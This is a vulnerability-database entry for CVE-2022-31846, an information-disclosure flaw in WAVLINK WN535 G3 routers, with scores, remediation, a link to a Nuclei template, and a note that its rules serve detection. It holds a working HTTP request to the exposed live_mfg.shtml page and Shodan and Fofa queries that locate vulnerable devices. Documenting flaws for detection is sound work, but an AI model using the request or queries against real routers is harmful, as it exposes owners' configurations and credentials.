🔙 목록으로 돌아가기

CVE-2022-31846: WAVLINK WN535 G3 - Information Disclosure

TitleWAVLINK WN535 G3 - Information Disclosure
Authorarafatansari
SeverityHigh
ImpactAn attacker can exploit this vulnerability to gain unauthorized access to sensitive information, such as router configuration settings and user credentials.
RemediationApply the latest firmware update provided by the vendor to fix the information disclosure vulnerability.
CVSS Score7.5
EPSS Score0.38199
CVE IDCVE-2022-31846
CWE IDCWE-668
Shodan Queryhttp.html:"Wavlink"http.html:"wavlink"http.title:"wi-fi app login"
Fofa Querytitle="wi-fi app login"body="wavlink"
Tags cve cve2022 wavlink exposure vuln

🔍 Vulnerability Description

WAVLINK WN535 G3 M35G3R.V5030.180927 is susceptible to information disclosure in the live_mfg.shtml page. An attacker can obtain sensitive router information via the exec cmd function and possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations.

🌐 HTTP Request

GET /live_mfg.shtml HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-31846.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-31846.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A